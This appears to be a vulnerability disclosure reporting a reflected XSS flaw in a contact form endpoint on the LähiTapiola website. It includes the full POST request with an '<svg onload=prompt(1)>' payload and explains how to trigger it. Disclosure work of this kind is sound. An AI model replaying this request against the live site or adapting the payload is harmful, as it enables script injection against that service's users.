Reflected XSS in LTContactFormReceiver (/cs/Satellite)

URL: http://www.lahitapiola.fi/cs/Satellite POST: pagename=LahiTapiola/LTContactFormReceiver &formId=1310385477986 &campaignID= &lotteryIDList=1 &soaperrorMessage= &soapServerErrorMessage= &acceptTermsErrorMessage=<svg onload=prompt(1)> &radioErrorMessage= &dropdownErrorMessage= &constraintErrorMessage= &restServiceError= &agreeTerms=2 &contactLahiTapiola=8 &modeOfContact=Toivon%2Byhteydenottoa%2Bpuhelimitse &phoneRadioChecked=true &agreementForMarketing= &dropdownList= &radioQuestionList= &dropdownSize= &radioListSize= &lt-viesti=abc &lt-etunimi=abc &lt-sukunimi=abc &lt-puhnro=abc &[email protected] &lt-lahiosoite=abc &lt-postinumero=1 &lt-postitoimipaikka=abc &lt-status=Samoancukie Describe: It is Reflected XSS bug generated by 2 params: +agreeTerms +acceptTermsErrorMessage first i set agreeTerms to random number to make it error, then i set xss payload to acceptTermsErrorMessage to display it in browser (<svg onload=prompt(1)>). P/s: Sorry if this bug is self-xss. I have no idea what self-xss is, so i google it and wiki say "Self-XSS operates by tricking users into copying and pasting malicious content into their browsers' web developer console", so maybe only console xss is Self XSS? https://en.wikipedia.org/wiki/Self-XSS